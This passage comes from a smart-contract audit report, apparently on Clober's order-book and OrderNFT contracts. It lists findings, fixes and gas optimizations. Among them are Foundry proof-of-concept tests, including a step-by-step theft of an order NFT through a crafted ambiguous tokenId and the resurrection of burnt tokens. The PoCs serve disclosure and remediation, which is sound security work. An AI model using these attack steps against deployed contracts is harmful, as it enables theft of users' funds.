// Step 1. Attacker creates an ASK limit order and receives NFT
uint16 priceIndex = 100;
uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({
    user: attacker,
    priceIndex: priceIndex,
    rawAmount: 0,
    baseAmount: 10**18,
    options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY),
    data: new bytes(0)
});

// Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds
CloberOrderBook.OrderKey memory order_key =
    CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex});
uint256 tokenId = orderToken.encodeId(order_key);
uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId

// Step 3. Attacker approves both the victim (can be a third-party protocol like OpenSea) and his other account
vm.startPrank(attacker);
orderToken.approve(victim, tokenId);
orderToken.approve(attacker2, ambiguous_tokenId);
vm.stopPrank();

// Step 4. Victim transfers the NFT to themselves. (Or the attacker trades it)
vm.startPrank(victim);
orderToken.transferFrom(attacker, victim, tokenId);
vm.stopPrank();

// Step 5. Attacker steals the NFT
vm.startPrank(attacker2);
orderToken.transferFrom(victim, attacker2, ambiguous_tokenId);
vm.stopPrank();

Recommendation: Validate the decoded uint8 value to be either 0 or 1, which unambiguously converts to bid and ask respectively. Clober: Fixed in commit 22b9a233. Spearbit: Fixed.

5.2 High Risk

+5.2.1 Missing owner check on from when transferring tokens Severity: High Risk Context: OrderNFT.sol#L207 Description: OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT, passing the victim as from, by calling transferFrom(from=victim, to=attackerAccount, tokenId=attackerTokenId). This passes the _isApprovedOrOwner check, but reduces from's balance. Recommendation: Add the following check to _transfer: require(ownerOf(tokenId) == from, Errors.ACCESS); Clober: Fixed PR 310. Spearbit: Verified. Ownership check added.

+5.2.2 Wrong minimum net fee check Severity: High Risk Context: MarketFactory.sol#L79, MarketFactory.sol#L111 Description: A minimum net fee was introduced that all markets should comply with, such that the protocol earns fees. The protocol fees are computed as takerFee + makerFee, and the market factory performs the wrong check. Fee pairs that should be accepted are currently not accepted and, even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way.
Recommendation: Implement a takerFee + makerFee >= minNetFee check instead: require(int256(uint256(takerFee)) + makerFee >= minNetFee, Errors.INVALID_FEE); Clober: Fixed in PR 307, PR 308 and PR 311. Spearbit: Fixed. The condition has been inverted for the use of custom errors. if (marketHost != owner && int256(uint256(takerFee)) + makerFee < int256(uint256(minNetFee))) { revert Errors.CloberError(Errors.INVALID_FEE);

+5.2.3 Rounding up of taker fees of constituent orders may exceed the collected fee Severity: High Risk Context: OrderBook.sol#L463 OrderBook.sol#L478-L482 OrderBook.sol#L604 Description: If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: • takerFee = 100011 (10.0011%) • 2 maker orders of amounts 400000 and 377000 • total amount = 400000 + 377000 = 777000 • taker fee taken = 777000 * 100011 / 1000000 = 77708.547, rounded up to 77709. The maker fees would be 377000 * 100011 / 1000000 = 37704.147, rounded up to 37705, and 400000 * 100011 / 1000000 = 40004.4, rounded up to 40005, which together is 1 wei more than actually taken. Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol:

function testClaimFeesFailFromRounding() public {
    _createOrderBook(0, 100011); // 10.0011% taker fee
    // create 2 orders
    uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT);
    uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT);
    // take both orders
    _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT);
    CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2);
    ids[0] = CloberOrderBook.OrderKey({
        isBid: Constants.BID,
        priceIndex: Constants.PRICE_INDEX,
        orderIndex: orderIndex1
    });
    ids[1] = CloberOrderBook.OrderKey({
        isBid: Constants.BID,
        priceIndex: Constants.PRICE_INDEX,
        orderIndex: orderIndex2
    });
    // perform claim
    orderBook.claim(address(this), ids);
    // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance();
    // console.log(quoteFeeBal); // fee accounted = 20004
    // console.log(baseFeeBal); // fee accounted = 0
    // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003
    // try to claim fees, will revert
    vm.expectRevert("ERC20: transfer amount exceeds balance");
    orderBook.collectFees();
}

Recommendation: Consider rounding down the taker fee instead of rounding up. Clober: Fixed in PR 325. While checking this issue, I found that we should use rounding up in the 3 parts below (pretty informative) to avoid losses for the protocol: 1. flash loan fee calculation: OrderBook.sol#L330-L331 2. dao fee calculation: OrderBook.sol#L839 3. maker fee (when makerFee > 0) calculation: OrderBook.sol#L476 Spearbit: Fixed.

+5.2.4 Drain tokens condition due to reentrancy in collectFees Severity: High Risk Context: OrderBook.sol#L800-L810 Description: The collectFees function is not guarded by a reentrancy guard. In case a transfer of at least one of the tokens in a trading pair allows invoking arbitrary code (e.g. a token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The reentrancy condition allows transferring collected fees multiple times to both the DAO and the host, beyond the actual fee counter. Recommendation: Add a reentrancy guard to the collectFees function to mitigate the issue, or implement a checks-effects-interactions pattern to update the balance before the transfer is executed. Clober: Fixed in commit 93b287d2. Spearbit: Verified. nonReentrant added.
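For illustration, a minimal checks-effects-interactions sketch (ours, not the project's code; it ignores the 1-wei sentinel the real OrderBook keeps for gas reasons): zero the fee counters before any external call, so a re-entering token hook can never observe stale balances.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20Like {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract FeeVaultSketch {
    IERC20Like internal _quoteToken;
    IERC20Like internal _baseToken;
    uint256 internal _quoteFeeBalance;
    uint256 internal _baseFeeBalance;
    address internal _recipient;

    function collectFees() external {
        uint256 quoteAmount = _quoteFeeBalance;
        uint256 baseAmount = _baseFeeBalance;
        // Effects first: counters are zeroed before any token call.
        _quoteFeeBalance = 0;
        _baseFeeBalance = 0;
        // Interactions last: a malicious hook re-entering collectFees now
        // only sees zeroed counters and can transfer nothing extra.
        if (quoteAmount > 0) require(_quoteToken.transfer(_recipient, quoteAmount));
        if (baseAmount > 0) require(_baseToken.transfer(_recipient, baseAmount));
    }
}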
5.3 Medium Risk

+5.3.1 Group claim clashing condition Severity: Medium Risk Context: OrderBook.sol#L685 Description: The claim functionality is designed to support 3rd-party operators claiming multiple orders on behalf of the market's users, to finalise the transactions, deliver assets and earn bounties. The code allows iterating over a list of orders to execute _claim.

function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall {
    uint32 totalBounty = 0;
    for (uint256 i = 0; i < orderKeys.length; i++) {
        ...
        (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim(
            queue, mOrder, orderKey, claimer
        );
        ...
    }
}

However, neither the claim nor the _claim function in OrderBook supports skipping already fulfilled orders. On the contrary, in case of a revert in _claim the whole transaction is reverted.

function _claim(...) private returns (...) {
    ...
    require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM);
    ...
}

Such an implementation does not fully support the initial idea of 3rd-party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen, for instance, when two bots get overlapping lists of orders, or when the owner of an order decides to claim or cancel his/her order manually while the bot is about to claim it as well. Recommendation: It is recommended to consider skipping already claimed orders to resolve the described clashing claim cases. Clober: Fixed PR 338. Spearbit: Verified. claim now skips orders which could cause a revert in _claim. Other functions invoking claim do have a proper check before _claim is invoked and are thus not affected.

+5.3.2 Order owner isn't zeroed after burning Severity: Medium Risk Context: OrderBook.sol#L821-L823 OrderNFT.sol#L78-L82 OrderNFT.sol#L189 Description: The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT as having been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call the approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero.
function testNFTMovementAfterBurn() public {
    _createOrderBook(0, 0);
    address attacker2 = address(0x1337);
    // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3
    uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT);
    _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT);
    CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({
        isBid: Constants.BID,
        priceIndex: Constants.PRICE_INDEX,
        orderIndex: orderIndex1
    });
    uint256 tokenId = orderToken.encodeId(orderKey);
    // Step 2: burn 1 NFT by cancelling one of the orders
    vm.startPrank(Constants.MAKER);
    orderBook.cancel(Constants.MAKER, _toArray(orderKey));
    // verify ownership is still maker
    assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, "NFT_OWNER");
    // Step 3: resurrect burnt token by calling safeTransferFrom
    orderToken.safeTransferFrom(Constants.MAKER, attacker2, tokenId);
    // verify ownership is now attacker2
    assertEq(orderToken.ownerOf(tokenId), attacker2, "NFT_OWNER");
}

Recommendation: The owner should be zeroed in _burnToken().

 function _burnToken(OrderKey memory orderKey) internal {
     CloberOrderNFT(orderToken).onBurn(orderKey.isBid, orderKey.priceIndex, orderKey.orderIndex);
+    _getOrder(orderKey).owner = address(0);
 }

Clober: Fixed in PR 334. Spearbit: Verified. The owner of the order is correctly zeroed in the OrderBook after burning the NFT.

+5.3.3 Lack of two-step role transfer Severity: Medium Risk Context: MarketFactory.sol#L146-L152 MarketFactory.sol#L137-L140 Description: The contracts lack a two-step role transfer. Both the transfer of ownership of the MarketFactory and the change of a market's host are implemented as single-step functions. Basic validation that the address is not the zero address is performed for a market; however, the case where the address receiving the role is inaccessible is not covered properly. Taking into account that handOverHost can be invoked without any supervision by anyone who created a market, it is possible to make a typo unintentionally, or intentionally if the attacker simply wants to brick fee collection, as the host currently affects collectFees in OrderBook (described as a separate issue). The ownership transfer should in theory be less error-prone, as it should be done by the DAO with great care; still, a two-step role transfer is preferable. Recommendation: It is recommended to implement a two-step role transfer where the role recipient is set and then the recipient has to claim that role to finalise the role transfer. Clober: Fixed in PR 322. Spearbit: Verified. Two-step role transfers added for the contract's owner and the market's host.
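A minimal sketch of the recommended pattern (ours; the contract, function names and ACCESS string are hypothetical, not Clober's fix): the nominated host must actively claim the role, so an inaccessible or typo'd address can never silently end up holding it.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract TwoStepHostSketch {
    address public host;
    address public pendingHost;

    constructor() {
        host = msg.sender;
    }

    // Step 1: the current host only nominates; nothing is transferred yet.
    function handOverHost(address newHost) external {
        require(msg.sender == host, "ACCESS");
        pendingHost = newHost;
    }

    // Step 2: the nominee proves the address is usable by claiming the role.
    function claimHost() external {
        require(msg.sender == pendingHost, "ACCESS");
        host = pendingHost;
        pendingHost = address(0);
    }
}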
+5.3.4 Atomic fees delivery susceptible to funds lockout Severity: Medium Risk Context: OrderBook.sol#L791-L798 OrderBook.sol#L804-L805 Description: The collectFees function delivers the quoteToken part of the fees as well as the baseToken part of the fees atomically and simultaneously to both the DAO and the host. In case a single address is, for instance, blacklisted (e.g. via the USDC blacklist feature), or a token in a pair happens to be malicious and is configured in a way that a transfer to one of the addresses reverts, it is possible to block fee delivery.

function collectFees() external nonReentrant { // @audit delivers both tokens atomically
    require(msg.sender == _host(), Errors.ACCESS);
    if (_baseFeeBalance > 1) {
        _collectFees(_baseToken, _baseFeeBalance - 1);
        _baseFeeBalance = 1;
    }
    if (_quoteFeeBalance > 1) {
        _collectFees(_quoteToken, _quoteFeeBalance - 1);
        _quoteFeeBalance = 1;
    }
}

function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets
    uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION;
    uint256 hostFeeAmount = amount - daoFeeAmount;
    _transferToken(token, _daoTreasury(), daoFeeAmount);
    _transferToken(token, _host(), hostFeeAmount);
}

There are multiple cases where such a situation can happen: for instance, a malicious host may want to block the function for the DAO to prevent it from collecting the at-least-guaranteed, valuable quoteToken, or a hacked DAO can swap the treasury to some invalid address and renounce ownership to brick collectFees across multiple markets. With the current implementation, in case it is not possible to transfer tokens, it is necessary to swap the problematic address, which, depending on the specific case, might not be trivial. Recommendation: It is recommended to parametrize collectFees to choose a token to collect, and to keep separate counters of delivered fees. Clober: Fixed in PR 359. Spearbit: Verified. The function was parametrized to deliver a given token to a single recipient.

+5.3.5 DAO fees potentially unavailable due to overly strict access control Severity: Medium Risk Context: OrderBook.sol#L790 Description: The collectFees function is guarded by an inline access control require condition which prevents anyone except the host from invoking the function. Only the host of the market is authorized to invoke it and thereby deliver all collected fees, including the part of the fees belonging to the DAO.

function collectFees() external nonReentrant {
    require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized
    if (_baseFeeBalance > 1) {
        _collectFees(_baseToken, _baseFeeBalance - 1);
        _baseFeeBalance = 1;
    }
    if (_quoteFeeBalance > 1) {
        _collectFees(_quoteToken, _quoteFeeBalance - 1);
        _quoteFeeBalance = 1;
    }
}

This access control is too strict and can lead to funds being locked permanently in the worst-case scenario. The host is a single point of failure: in case access to the wallet is lost or incorrectly transferred, the fees of both the host and the DAO will be locked. Recommendation: It is recommended to remove the access control from the collectFees function, as collected fees are transferred to fixed addresses, namely the host and the treasury. In such a setup, anyone should be able to invoke the function and trigger delivery of the collected fees at any time; it should not be limited only to the host of the market. Clober: Fixed in PR 315. Spearbit: Verified. Authorization modified. Everyone can trigger the function.
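A sketch of the direction both findings above point toward (ours; the signature, mapping and names are hypothetical, not Clober's actual fix): permissionless triggering, parametrized per token and per recipient, so one blocked transfer cannot lock any other flow.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20Like {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract ParametrizedFeesSketch {
    address internal _host;
    address internal _daoTreasury;
    // fees owed, tracked separately per token and per recipient
    mapping(address => mapping(address => uint256)) internal _feeOwed;

    // Anyone may trigger delivery; funds only ever move to fixed addresses.
    function collectFees(address token, address destination) external {
        require(destination == _host || destination == _daoTreasury, "BAD_DESTINATION");
        uint256 amount = _feeOwed[token][destination];
        _feeOwed[token][destination] = 0;
        require(IERC20Like(token).transfer(destination, amount), "TRANSFER_FAILED");
    }
}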
OrderNFT no longer inherits Ownable; onlyOwner has been replaced with +5.4.2 OrderNFTs can be renamed Severity: Low Risk Context: OrderNFT.sol#L53-L59 Description: The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, suddenly renaming tokens by a malicious market host could lead to web2 phishing attacks. Recommendation: If there is no good usecase for the renaming functionality, consider removing these functions and only setting the name and symbol in its init function. Clober: Fixed in PR 335. Spearbit: Fixed. +5.4.3 DOSing _replaceStaleOrder() due to reverting on token transfer Severity: Low Risk Context: OrderBook.sol#L676-L677 Description: In the case of tokens with implemented hooks, a malicious order owner can revert on token received event thus cause a denial-of-service via _replaceStaleOrder(). The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks. Recommendation: Use a blacklist/whitelist system to filter out non-standard tokens. In case the recommendation is implemented only partially, consider implementing in the UI a proper warnings for known malicious tokens, so end-users can easily identify which assets should be avoided. Clober: Fixed in PR 363. Allow list was implemented in the MarketFactory for a quoteToken. The _replaceS- taleOrder function was removed and the logic was replaced to be non-blocking to resolve this as well as other denial-of-service conditions. Spearbit: Currently the implementation allows only to create a market where a quoteToken is among whitelisted assets. It is possible, at any time, to prevent creating new markets (OrderBooks) for any given quoteToken as the allow list can be updated at any time by the owner, what can potentially be used to censor some types of markets if abused. This however, affects neither already created markets nor baseToken. The latter currently is not restricted. 19 It was verified the modifications to replace stale orders is no longer blocking, preventing successful exploitation of malicious hooks. +5.4.4 Total claimable bounties may exceed type(uint32).max Severity: Low Risk Context: OrderBook.sol#L209 OrderBook.sol#L218 OrderBook.sol#L279 OrderBook.sol#L301 Description: Individual bounties are capped to type(uint32).max which is ~4.295 of a native token of 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of Polygon network) for their sum to therefore exceed type(uint32).max. Recommendation: Change the totalCanceledBounty and totalBounty variable types to uint64. - uint32 totalCanceledBounty = 0; + uint64 totalCanceledBounty = 0; - uint32 totalBounty = 0; + uint64 totalBounty = 0; Clober: Fixed in PR 340. Spearbit: Fixed. Variable type has been changed to uint256. Moreover, the addition to these variables are made unchecked, hence it is extremely unlikely for overflow to occur. 
+5.4.4 Total claimable bounties may exceed type(uint32).max
Severity: Low Risk
Context: OrderBook.sol#L209 OrderBook.sol#L218 OrderBook.sol#L279 OrderBook.sol#L301
Description: Individual bounties are capped to type(uint32).max, which is ~4.295 units of a native token with 18 decimals (4.2949673e18 wei). It is possible (and, in the case of the Polygon network, likely) for their sum to exceed type(uint32).max.
Recommendation: Change the totalCanceledBounty and totalBounty variable types to uint64.
- uint32 totalCanceledBounty = 0;
+ uint64 totalCanceledBounty = 0;
- uint32 totalBounty = 0;
+ uint64 totalBounty = 0;
Clober: Fixed in PR 340.
Spearbit: Fixed. The variable type has been changed to uint256. Moreover, the additions to these variables are made unchecked, hence it is extremely unlikely for an overflow to occur.
// overflow when length == 2**224 > 2 * size(priceIndex) * _MAX_ORDER, absolutely never happening
unchecked {
    totalCanceledBounty += claimBounty;
}
// overflow when length == 2**224 > 2 * size(priceIndex) * _MAX_ORDER, absolutely never happening
unchecked {
    totalBounty += mOrder.claimBounty;
}
+5.4.5 Can fake market order in TakeOrder event
Severity: Low Risk
Context: OrderBook.sol#L169
Description: Market orders in Orderbook.marketOrder set the 8th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with the 8th bit set and spoof a market order event.
Recommendation: Consider clearing unused bits from options:
// limit
options = options & 0x03
// market
options = (options | 0x80) & 0x83
Clober: Fixed in commit e2b25d49.
Spearbit: Fixed.
+5.4.6 _priceToIndex will revert if price is type(uint128).max
Severity: Low Risk
Context: GeometricPriceBook.sol#L82
Description: Because price is of type uint128, the increment will overflow before it is cast to uint256:
uint256 shiftedPrice = uint256(price + 1) << 64;
Recommendation: Cast price to uint256 first:
- uint256 shiftedPrice = uint256(price + 1) << 64;
+ uint256 shiftedPrice = (uint256(price) + 1) << 64;
Clober: Fixed in PR 367.
Spearbit: Verified. The recommended cast was applied in the PR, but not applied to the main branch by the end of the fixing time window.
+5.4.7 Using block.chainid for the create2 salt can be problematic if there is a chain hardfork
Severity: Low Risk
Context: MarketFactory.sol#L182 StableMarketDeployer.sol#L30 VolatileMarketDeployer.sol#L28 MarketFactory.sol#L155
Description: Using block.chainid as a salt for create2 can result in inconsistency if there is a chain split event (e.g. the eth2 merge). A split produces two different chains with different chain ids (one keeping the original chain id and one receiving a new value), which leaves one of the chains unable to interact with the markets and NFTs properly. It also complicates fork testing, which changes the chain id in the local environment.
Recommendation: Cache block.chainid as a private immutable value _chainId, or simply do not use block.chainid as the create2 salt.
Clober: Fixed in PR 331.
Spearbit: Fixed. block.chainid is cached in _cachedChainId.
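A minimal sketch of the caching pattern applied in the fix: the chain id is read once at deployment into an immutable, so any create2-derived addresses stay stable even if block.chainid later changes after a fork. The salt derivation shown is an illustrative assumption, not the actual factory code:
pragma solidity ^0.8.0;

contract ChainIdCacheSketch {
    // Read once at deployment; unaffected by a later chain split.
    uint256 private immutable _cachedChainId;

    constructor() {
        _cachedChainId = block.chainid;
    }

    function _salt(address quoteToken, address baseToken) internal view returns (bytes32) {
        // Uses the cached value instead of reading block.chainid at call time.
        return keccak256(abi.encode(_cachedChainId, quoteToken, baseToken));
    }
}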
5.5 Gas Optimization
+5.5.1 Use get64Unsafe() when updating claimable in take()
Severity: Gas Optimization
Context: OrderBook.sol#L588-L593
Description: get64Unsafe() can be used when fetching the stored claimable value, since _getClaimableIndex() returns elementIndex < 4.
Recommendation: Consider applying the following change:
  claimable[groupIndex] = claimableGroup.update64Unsafe(
      elementIndex,
-     claimableGroup.get64(elementIndex).addClean(takenRawAmount)
+     claimableGroup.get64Unsafe(elementIndex).addClean(takenRawAmount)
  );
Clober: Fixed in commit ce0e2513.
Spearbit: Fixed.
+5.5.2 Checking for zero is cheaper than checking against a concrete value
Severity: Gas Optimization
Context: SignificantBit.sol#L14
Description: Checking whether the result is zero, as opposed to checking whether the result is or isn't a concrete value, saves one opcode.
Recommendation: Consider applying the following change:
- x & 1 != 1
+ x & 1 == 0
Clober: Fixed in PR 36.
Spearbit: Fixed.
+5.5.3 Function argument can be skipped
Severity: Gas Optimization
Context: OrderBook.sol#L240
Description: The address caller parameter of the internal _cancel function can be replaced with msg.sender, as this is effectively the value that is actually used when the function is invoked.
Recommendation: Remove the caller argument from the _cancel function. Additionally, it is recommended to make a similar change and replace CloberMarketSwapCallbackReceiver(callbackReceiver) with CloberMarketSwapCallbackReceiver(msg.sender) to simplify the code and the security analysis.
Clober: Fixed in commit c43c3a04 and PR 360.
Spearbit: Verified. Both recommendations applied.
+5.5.4 Redundant flash loan balance cap
Severity: Gas Optimization
Context: OrderBook.sol#L323-L330
Description: The requested flash loan amounts are checked against and capped to the contract's token balances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens, and otherwise let the function revert from the failure to transfer the requested tokens.
Recommendation: Remove the check against the contract's token balances.
- if (quoteAmount > beforeQuoteAmount) {
-     quoteAmount = beforeQuoteAmount;
- }
- if (baseAmount > beforeBaseAmount) {
-     baseAmount = beforeBaseAmount;
- }
Clober: Fixed in PR 342.
Spearbit: Fixed.
+5.5.5 Do direct assignment to totalBaseAmount and totalQuoteAmount
Severity: Gas Optimization
Context: OrderBook.sol#L303-L309
Description: While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and assigned a value each iteration. Since they are only incremented in the referenced block (and the cases are mutually exclusive), the assignment can be direct instead of an increment.
Recommendation: Do a direct assignment to totalBaseAmount and totalQuoteAmount instead of the += operation.
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.6 Redundant zero minusFee setter
Severity: Gas Optimization
Context: OrderBook.sol#L724
Description: minusFee defaults to zero, so explicitly setting it is redundant.
Recommendation: While the assignment can be removed, it is recommended to keep it as a comment for clarity.
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.7 Load _FEE_PRECISION into a local variable before usage
Severity: Gas Optimization
Context: OrderBook.sol#L331-L332
Description: Loading _FEE_PRECISION into a local variable slightly reduces bytecode size (0.017kB) and was found to be a tad more gas efficient.
Recommendation:
+ uint256 feePrecision = _FEE_PRECISION;
- uint256 quoteFeeAmount = (quoteAmount * takerFee) / _FEE_PRECISION;
- uint256 baseFeeAmount = (baseAmount * takerFee) / _FEE_PRECISION;
+ uint256 quoteFeeAmount = (quoteAmount * takerFee) / feePrecision;
+ uint256 baseFeeAmount = (baseAmount * takerFee) / feePrecision;
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.8 Can cache value difference in SegmentedSegmentTree464.update
Severity: Gas Optimization
Context: SegmentedSegmentTree464.sol#L160, SegmentedSegmentTree464.sol#L170
Description: The replaced - value expression in SegmentedSegmentTree464.update is recomputed several times in each loop iteration.
Recommendation: Consider caching the value for both loops:
uint64 diff = replaced - value;
Clober: Fixed in commit 3e9e6b16.
Spearbit: Fixed.
+5.5.9 Unnecessary loop condition in pop
Severity: Gas Optimization
Context: SegmentedSegmentTree464.sol#L84
Description: The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason the loop still terminates is that the first layer only has group indices 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and the loop then exits via the break keyword.
Recommendation: This loop condition is not necessary and can be removed.
Clober: Fixed in commit 22055e96.
Spearbit: Fixed.
+5.5.10 Use same comparisons for children in heap
Severity: Gas Optimization
Context: OctopusHeap.sol#L237
Description: The pop function compares one child with a strict inequality and the other with a non-strict one. A heap does not guarantee order between the children, and there are no duplicate nodes (wordIndexes).
Recommendation: Use the strict inequality for both comparisons:
- if (leftChildWordIndex > wordIndex && rightChildWordIndex >= wordIndex) {
+ if (leftChildWordIndex > wordIndex && rightChildWordIndex > wordIndex) {
Clober: Fixed in commit 2cbeae15.
Spearbit: Fixed.
+5.5.11 Gas optimization for OctopusHeap.pop's newLength computation
Severity: Gas Optimization
Context: OctopusHeap.sol#L224
Description: The newLength computation relies on an underflow in the lower bits to wrap from "length of 256" (= stored 0 and heap is not empty) to 255. The code can be made clearer and optimized:
unchecked {
    newLength = uint8(head) - 1;
}
Clober: Fixed in commit 2cbeae15.
Spearbit: Fixed.
+5.5.12 Gas optimization for OctopusHeap.root
Severity: Gas Optimization
Context: OctopusHeap.sol#L174
Description: The code can be optimized by using or instead of a checked addition:
- return (uint16(wordIndex) << 8) + bitIndex;
+ return (uint16(wordIndex) << 8) | bitIndex;
Clober: Fixed in commit 2cbeae15.
Spearbit: Fixed.
+5.5.13 No need for explicit assignment with default values
Severity: Gas Optimization
Context: OrderBook.sol#L126-L127 OrderBook.sol#L218-L220 OrderBook.sol#L290 OrderBook.sol#L308-L309 OrderBook.sol#L561-L562 OrderBook.sol#L695
Description: Explicitly assigning a zero value (or any default value) costs gas but is not needed.
Recommendation: Skip initial assignments with zero values.
Clober: Addressed in PR 313 and PR 360.
Spearbit: Fixed, except for an instance in the _take() function where the removal oddly increases the bytecode size with no change in gas usage.
+5.5.14 Prefix increment is more efficient than postfix increment
Severity: Gas Optimization
Context: Orderbook.sol#L210 OrderBook.sol#L280 OrderBook.sol#L530
Description: The prefix increment reduces bytecode size by a little and is slightly more gas efficient.
Recommendation: Implement the following:
- i++
+ ++i
- ret += 1
+ ++ret;
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.15 Tree update can be avoided for fully filled orders
Severity: Gas Optimization
Context: OrderBook.sol#L262-L267
Description: For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped, since the new value is the same as the old value. Hence, the code block can be moved inside the if (remainingAmount > 0) block.
Recommendation: Shift the tree update call to inside the if (remainingAmount > 0) code block.
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.16 Shift msg.value cap check for earlier revert
Severity: Gas Optimization
Context: OrderBook.sol#L118
Description: The cap check on msg.value should be shifted up to the top of the function so that failed checks revert earlier, saving gas in these cases.
Recommendation: Shift the check up before the isBid and bountyRefundAmount initialisations.
Clober: Fixed in PR 313.
Spearbit: Fixed.
+5.5.17 Solmate's ReentrancyGuard is more efficient than OpenZeppelin's
Severity: Gas Optimization
Context: OrderBook.sol#L8
Description: Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient, as it reduces the bytecode size by 0.11kB; this can be reduced further if its require statement is modified to revert with a custom error.
Recommendation: Use Solmate's ReentrancyGuard instead.
Clober: Changed in PR 305.
Spearbit: Fixed. Modified Solmate's ReentrancyGuard to use a custom error instead of a require statement.
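A minimal sketch of the modified guard described in the resolution: a Solmate-style lock that reverts with a custom error rather than a require string (illustrative, not the exact code that was merged):
pragma solidity ^0.8.0;

abstract contract ReentrancyGuardSketch {
    error Reentrancy();

    // 1 = unlocked, 2 = locked; non-zero resting value keeps the slot warm.
    uint256 private _locked = 1;

    modifier nonReentrant() {
        if (_locked != 1) revert Reentrancy();
        _locked = 2;
        _;
        _locked = 1;
    }
}
A custom error encodes as a 4-byte selector instead of an ABI-encoded revert string, which is where the additional bytecode saving comes from.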
Spearbit: Fixed. +5.5.17 Solmate's ReentrancyGuard is more efficient than OpenZeppelin's Severity: Gas Optimization Context: OrderBook.sol#L8 Description: Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error. Recommendation: Use Solmate's ReentrancyGuard instead. Clober: Changed in PR 305. Spearbit: Fixed. Modified Solmate's ReentrancyGuard to use custom error instead of require statement. +5.5.18 r * r is more gas efficient than r ** 2 Severity: Gas Optimization Context: GeometricPriceBook.sol#L31-L47 Description: It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost. Recommendation: Replace the instances of r ** 2 to r * r. Clober: Fixed in commit 941d688f. Spearbit: Fixed. 26 +5.5.19 Update childHeapIndex and shifter initial values to constants Severity: Gas Optimization Context: OctopusHeap.sol#L233 SegmentedSegmentTree464.sol#L42 SegmentedSegmentTree464.sol#L180 Description: The initial values of childHeapIndex and shifter can be better hardcoded to avoid redundant operations. Recommendation: Implement the following changes: • OctopusHeap - uint16 childHeapIndex = _getLeftChildHeapIndex(heapIndex); + uint16 childHeapIndex = 2; • SegmentedSegmentTree464 - uint256 private constant _MAX_NODES_P = 15; + uint256 private constant _MAX_NODES_P_MINUS_ONE = 14; - uint256 shifter = _MAX_NODES_P - 1 + uint256 shifter = _MAX_NODES_P_MINUS_ONE Clober: Fixed PR 39. Spearbit: Fixed. +5.5.20 Same value tree update falls under else case which will do redundant overflow check Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L153 Description: In the case where value and replaced are equal, it currently will fall under the else case which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all. Recommendation: One could combine the equality case with the if case, do an early return, or ensure that the function is only called when there is a difference in values. - if (replaced > value) + if (replaced >= value) Clober: Fixed in commit 